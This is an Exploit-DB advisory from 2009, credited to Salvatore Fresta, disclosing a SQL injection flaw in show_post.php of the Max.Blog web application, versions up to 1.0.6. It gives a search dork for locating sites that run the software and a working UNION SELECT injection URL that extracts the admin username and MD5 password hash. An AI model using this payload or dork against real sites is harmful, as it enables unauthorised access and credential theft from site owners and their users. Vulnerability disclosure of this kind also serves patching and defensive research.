Max.Blog <= 1.0.6 show_post.php SQL Injection Vulnerability

2009-01-27T00:00:00
ID EDB-ID:7885
Type exploitdb
Reporter Salvatore Fresta
Modified 2009-01-27T00:00:00

Description

Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ###################             Salvatore "drosophila" Fresta         ###################


Application:     Max.Blog http://www.mzbservices.com
Version:         Max.Blog &lt;= 1.0.6
Bug:             * SQL Injection
Exploitation:    Remote
Dork:            intext:"Powered by Max.Blog"
Date:            20 Jan 2009
Discovered by:   Salvatore "drosophila" Fresta
Author:          Salvatore "drosophila" Fresta
                 e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

SQL Injection:

       File affected: show_post.php

       This bug allows a guest to view username and password (md5) of a
       registered user with the specified id (usually 1 for the admin)

       http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23

############################################################################

# milw0rm.com [2009-01-27]